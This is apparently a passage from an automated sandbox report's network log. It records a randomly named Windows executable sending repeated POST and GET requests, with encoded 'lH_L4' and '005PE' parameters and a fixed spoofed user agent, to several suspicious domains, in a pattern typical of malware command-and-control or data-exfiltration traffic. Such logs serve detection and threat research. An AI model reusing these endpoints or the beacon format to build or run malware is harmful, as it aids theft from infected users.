                                                                                  Date: Wed, 27 Nov 2024 00:27:05 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 409
                                                                                  Connection: close
                                                                                  ETag: "66d016cf-199"
                                                                                  Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  19 | 192.168.2.5 | 49973 | 47.76.213.197 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:06.679953098 CET | 1637 | OUT | POST /egqi/ HTTP/1.1
                                                                                  Host: www.ytsd88.top
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ytsd88.top
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ytsd88.top/egqi/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4= [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  20 | 192.168.2.5 | 49980 | 47.76.213.197 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:09.344810963 CET | 356 | OUT | GET /egqi/?lH_L4=b73RclDzsQx9LNfVP0mvFBo4qCNcPXUUZl7U/15lM3StUAJAIINJCW5I+z7gQYXdXqIUVixe3UGJ61mgF9Q8ksZ6wdRJyvWXXW5woHrN3vUqlgOg2KxD9o0N2wzkcF8JdQ==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.ytsd88.top
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:27:10.929296017 CET | 574 | IN | HTTP/1.1 404 Not Found
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:10 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 409
                                                                                  Connection: close
                                                                                  ETag: "66d016cf-199"
                                                                                  Data Ascii: <html><style>.btlink {color: #20a53a;text-decoration: none;}</style><meta charset="UTF-8"><html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><div style="text-align: center;font-size: 15px" >Power by <a class="btlink" href="https://www.bt.cn/?from=404" target="_blank"> ()</a></div></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  21 | 192.168.2.5 | 49992 | 208.91.197.27 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:16.783996105 CET | 630 | OUT | POST /hyyd/ HTTP/1.1
                                                                                  Host: www.matteicapital.online
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.matteicapital.online
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.matteicapital.online/hyyd/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=SoNrVhZITNTyVUIdnGhh4hfOVQPIHqcl3a3Vkp00DG2foIKPXTKorfrlxWdFWNNwOVPsmy3+QoLQ/D4l1Xi75ijUayWuGWXZJijA46TCPho7Ai66sH0XI6KxI58cR+OGeix4xqdXU/L/LZ2IsYbCP91PhTT9fHy8m13lUJzxV+rrDF4Itv9UXcLQz/W3FiVBhEtl5c0=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  22 | 192.168.2.5 | 49998 | 208.91.197.27 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:19.440047979 CET | 650 | OUT | POST /hyyd/ HTTP/1.1
                                                                                  Host: www.matteicapital.online
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.matteicapital.online
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.matteicapital.online/hyyd/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=SoNrVhZITNTyHgMdrF5hvRfNawPIMKch3a7VkrZpD0Cfpp6PGhyoofrl62dEYtNnOVSfmzL+QsjQ/Gcl1k645yjWOCWWI2XZJijA45uXPhw7BSK6+W1lTaKyP58cGuOKeiwvxpYyU5P/LZGIsJbBG91F+DTtWirqk0TCdZGkOPnsCzJi3N18E8nojseAUS0o7n9VnLjkq4UEAK4I3sf/93IiUHPF


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  23 | 192.168.2.5 | 50004 | 208.91.197.27 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:22.100759029 CET | 1667 | OUT | POST /hyyd/ HTTP/1.1
                                                                                  Host: www.matteicapital.online
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.matteicapital.online
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.matteicapital.online/hyyd/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4= [TRUNCATED]


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  24 | 192.168.2.5 | 50005 | 208.91.197.27 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:24.764094114 CET | 366 | OUT | GET /hyyd/?005PE=aNcLxhD894SLKl&lH_L4=fqlLWWUWU+rKW3EBskUV6SGgNRnmDoU2hpWkksgzCQayp6WkBROPj8SoyGxHGehCRFG0wA/ATtWP72Uz33qX2RXlPUSmGQTIeTj0jYuHFw88ATfT6HkRUZetCKkJWJDjJA== HTTP/1.1
                                                                                  Host: www.matteicapital.online
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:27:26.225665092 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  Date: Wed, 27 Nov 2024 00:27:25 GMT
                                                                                  Server: Apache
                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                  Set-Cookie: vsid=908vr480212845903186170; expires=Mon, 26-Nov-2029 00:27:25 GMT; Max-Age=157680000; path=/; domain=www.matteicapital.online; HttpOnly
                                                                                  X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hefu52TCdN0R6kEAzYny50qQ18/u8lVi0LA4hdkeewlmh01lmGWCkIakgFqfrXIsmJEPbR25fyz9OVHl7NrVQA==
                                                                                  Content-Length: 2640
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_hefu52TCdN0R6kEAzYny50qQ18/u8lVi0LA4hdkeewlmh01lmGWCkIakgFqfrXIsmJEPbR25
                                                                                  Nov 27, 2024 01:27:26.225786924 CET | 1236 | IN
                                                                                  Data Ascii: fyz9OVHl7NrVQA=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=1"></script><script type="text/javascript" src="http://www.matteicapital.online/px.js?ch=2
                                                                                  Nov 27, 2024 01:27:26.225795031 CET | 256 | IN
                                                                                  Data Ascii: style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta
                                                                                  Nov 27, 2024 01:27:26.225806952 CET | 907 | IN
                                                                                  Data Ascii: th=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"></head><body><div id="partner"></div><script type="text/javascript"> document.write( '<script type="text/javascript" language="J


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  25 | 192.168.2.5 | 50006 | 8.210.114.150 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:32.919441938 CET | 612 | OUT | POST /rsvy/ HTTP/1.1
                                                                                  Host: www.llljjjiii.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.llljjjiii.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.llljjjiii.shop/rsvy/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=m+7KIMtJ4/BT3KIg6gdk4TPghgCDUz0BonzPF5cM1Zjw1VwIPkTE4cfBMW0RJXN7Oge+aWHbyC3jErEbmu1IBv6Ry0of9Sfi5j674aH2beyUCwYr61h4scoLZ/tt0cC0o06lUd6x389l0X2Xnfd4Pm9Vj6bz1UtOJL628qkCI9tJ7jcMaCKbUe761LJFd6CbbJxftpY=
                                                                                  Nov 27, 2024 01:27:34.335968018 CET | 925 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:34 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Set-Cookie: PHPSESSID=hu051vtear25fibq2dqti0kr80; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Pragma: no-cache
                                                                                  Set-Cookie: sessionid=hu051vtear25fibq2dqti0kr80; expires=Sat, 25-Nov-2034 00:27:34 GMT; Max-Age=315360000; path=/
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  26 | 192.168.2.5 | 50007 | 8.210.114.150 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:35.835099936 CET | 632 | OUT | POST /rsvy/ HTTP/1.1
                                                                                  Host: www.llljjjiii.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.llljjjiii.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.llljjjiii.shop/rsvy/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=m+7KIMtJ4/BT2q4g8Bdk6zP/uACDOD0donvPF89X1M7w0x0IOlTE/cfBE20UNXNwOgTBaX7byCzjEoQbnddLQv6Trkodzyfi5j674eXYbeaUChIr7XZ/38oIJPttjMD9o06TUYba355l0WGXmKx3Em9T+KbiyHcdG6Smwap4YcRzz1tmAgCzH+XClYByMKjyBqhvz+OSJ5PNtdNHz/uCPS1n3lB2
                                                                                  Nov 27, 2024 01:27:37.283399105 CET | 925 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:37 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Set-Cookie: PHPSESSID=coq3s71no38ckfrjt3muer1bc5; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Pragma: no-cache
                                                                                  Set-Cookie: sessionid=coq3s71no38ckfrjt3muer1bc5; expires=Sat, 25-Nov-2034 00:27:36 GMT; Max-Age=315360000; path=/
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  27 | 192.168.2.5 | 50008 | 8.210.114.150 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:38.603723049 CET | 1649 | OUT | POST /rsvy/ HTTP/1.1
                                                                                  Host: www.llljjjiii.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.llljjjiii.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.llljjjiii.shop/rsvy/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:27:40.074174881 CET | 925 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:39 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Set-Cookie: PHPSESSID=76b991s5d3ujepciom71mi0od6; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Pragma: no-cache
                                                                                  Set-Cookie: sessionid=76b991s5d3ujepciom71mi0od6; expires=Sat, 25-Nov-2034 00:27:39 GMT; Max-Age=315360000; path=/
                                                                                  Content-Encoding: gzip


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  28 | 192.168.2.5 | 50009 | 8.210.114.150 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:41.280158043 CET | 360 | OUT | GET /rsvy/?lH_L4=r8TqL8lVmKhCyKg91gAe8j+3yCz/CgsH+3nLHstVk9be2gQWJEXa9NKMMz87e0tjGxvoPEvy6SLnfdtsmt5rRtv3mUECyzOywyqf8KPBYdutbjoA70JSrcAbMdNFzubz8Q==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.llljjjiii.shop
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:27:42.933449030 CET | 1120 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:27:42 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Accept-Encoding
                                                                                  Set-Cookie: PHPSESSID=h5a20f8gkc0ekecppbif37gj22; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  Pragma: no-cache
                                                                                  Set-Cookie: sessionid=h5a20f8gkc0ekecppbif37gj22; expires=Sat, 25-Nov-2034 00:27:42 GMT; Max-Age=315360000; path=/
                                                                                  Data Ascii: 268<html><head> <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no" /> <script src="/public/javascript/jquery-2.2.3.min.js?v=" type="text/javascript"></script></head><body style="background-color: #6da5c3;"><img style='max-width: 400px;width: 100%;position: absolute;right: 0;top: 30%;left: 0;margin: 0 auto;' src="/public/image/404.png"/>...<h1 style='width: 400px;position: absolute;margin-left: -200px;margin-top: -80px;top: 50%;left: 50%;display: block;z-index: 2000;color:#FB7C7C;text-align: center'> 404 Not Found </h1>--></body></html>0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  29 | 192.168.2.5 | 50010 | 3.33.130.190 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:48.744182110 CET | 618 | OUT | POST /huvt/ HTTP/1.1
                                                                                  Host: www.ampsamkok88.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ampsamkok88.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ampsamkok88.shop/huvt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=/z/07yxfDjX26e8ie9SvpT+r8joks215P61WbgN4tT6czc1jGRP9ma5KnJK6d8DQSxQCdWR9hwfZcY198eNuZFjRROls5bJIq/AswIqFleWqL45cV+3wQNOWu3ki1csvkYqsLSGTdN7HYOVVXPxroF4fPQyl17FOnu/0Bi6lL7NbXFY1C1YfwPCAjQDPQcxEijHeZtw=


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  30 | 192.168.2.5 | 50011 | 3.33.130.190 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:51.410229921 CET | 638 | OUT | POST /huvt/ HTTP/1.1
                                                                                  Host: www.ampsamkok88.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ampsamkok88.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ampsamkok88.shop/huvt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=/z/07yxfDjX24+MiS6+v4D+sgTok3G0+P6pWbkUntlicy9FjHTr92K5Ky5K7TcDbSxc8dX99hwLZcdJ97vNpYVjTdulukLJIq/AswIurleOqLLxcWf3zTNOVp3ki/8srkYqCLTb8dODHYOlVXbtsjF4jLQzAw4sXhty/BVfHYt55bTpfYXQ3jvu4zDL4BsQt4AXuH6kZQLcvzi3aEQQ1n5mxZPhF


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  31 | 192.168.2.5 | 50012 | 3.33.130.190 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:54.084717035 CET | 1655 | OUT | POST /huvt/ HTTP/1.1
                                                                                  Host: www.ampsamkok88.shop
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.ampsamkok88.shop
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.ampsamkok88.shop/huvt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  32 | 192.168.2.5 | 50013 | 3.33.130.190 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:27:56.759577990 CET | 362 | OUT | GET /huvt/?005PE=aNcLxhD894SLKl&lH_L4=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ== HTTP/1.1
                                                                                  Host: www.ampsamkok88.shop
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:27:57.850389957 CET | 414 | IN | HTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 27 Nov 2024 00:27:57 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 274
                                                                                  Connection: close
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?005PE=aNcLxhD894SLKl&lH_L4=yxXU4HpAbhaf+OkoYuih9i/g9QEw7HNYYa9VbkZ8i0eD7fFgPye8gqdK566WGP/XcS8CMkxomySFTtdD4uVPdmXJU5Nrv7tPj8ooy4ycuPqfNaJACPLoENW1kFMy7/pznQ=="}</script></head></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  33 | 192.168.2.5 | 50014 | 209.74.77.109 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:03.410196066 CET | 615 | OUT | POST /6gtt/ HTTP/1.1
                                                                                  Host: www.gogawithme.live
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.gogawithme.live
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.gogawithme.live/6gtt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=fEoUs3xbtCHRPbBdjaSJq4iTsRrzP/fkLZusXun+Vmrv2LXofGyFY+eisSJ97eZQ2auoUbyclO6AFuMj8orvd9DVYi3dvdV5Enjv/nrmKXadAPNJ1k4L76GJ0mRNRB09fbTSHNU/gDdWhvXyoA1EZqKj8V6BosDUWhfj51UHTTWs9Yf5Qjt222cohVGw1WGa6bzkSW0=
                                                                                  Nov 27, 2024 01:28:04.666182995 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 27 Nov 2024 00:28:04 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  34 | 192.168.2.5 | 50015 | 209.74.77.109 | 80 | 3812 | C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Nov 27, 2024 01:28:06.065623999 CET | 635 | OUT | POST /6gtt/ HTTP/1.1
                                                                                  Host: www.gogawithme.live
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.gogawithme.live
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.gogawithme.live/6gtt/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Ascii: lH_L4=fEoUs3xbtCHRO7Rdm9OJtYiSixrzd/foLZisXvTuJATv3u7oeFqFf+einyJ81+Zh2ajCUaOclPaAFucj/bDsPdDXTC3TyNV5Enjv/nO7KXCdAf9JvAMI2aGK8GRNVB05fbT8HOQVgGBWhsDyoR1DQqKlhF7Ouc2MZAv11nRmNTWs4uuTKBlelWwQxGOHkmnzg4jUMBhb+gkYu1lcTiBrGvstzTAT
                                                                                  Nov 27, 2024 01:28:07.281994104 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Wed, 27 Nov 2024 00:28:07 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 389
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
